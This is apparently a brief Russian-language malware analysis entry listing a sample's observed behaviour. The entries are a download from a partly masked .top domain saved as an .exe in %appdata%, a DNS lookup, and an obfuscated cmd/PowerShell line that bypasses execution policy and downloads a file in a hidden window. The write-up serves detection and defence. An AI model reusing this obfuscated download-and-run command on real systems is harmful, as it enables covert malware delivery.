Техническая информация
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwERSh^E^ll.^eX^E -EXE^CutIon^P^ol^ICy ^B^Y^p^a^Ss -^n^oPr^o^FILE^ -w^In^DOw^s^tyLe ^H^Id^DeN (ne^w^-^obje^cT S^YstE^m^.^N^Et.wE^b^C^lIen^T^).D^oWnLo^ad^FIlE('http://fo##...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "POwERSh^E^ll.^eX^E -EXE^CutIon^P^ol^ICy ^B^Y^p^a^Ss -^n^oPr^o^FILE^ -w^In^DOw^s^tyLe ^H^Id^DeN (ne^w^-^obje^cT S^YstE^m^.^N^Et.wE^b^C^lIen^T^).D^oWnLo^ad^FIlE('http://fo##...' (со скрытым окном)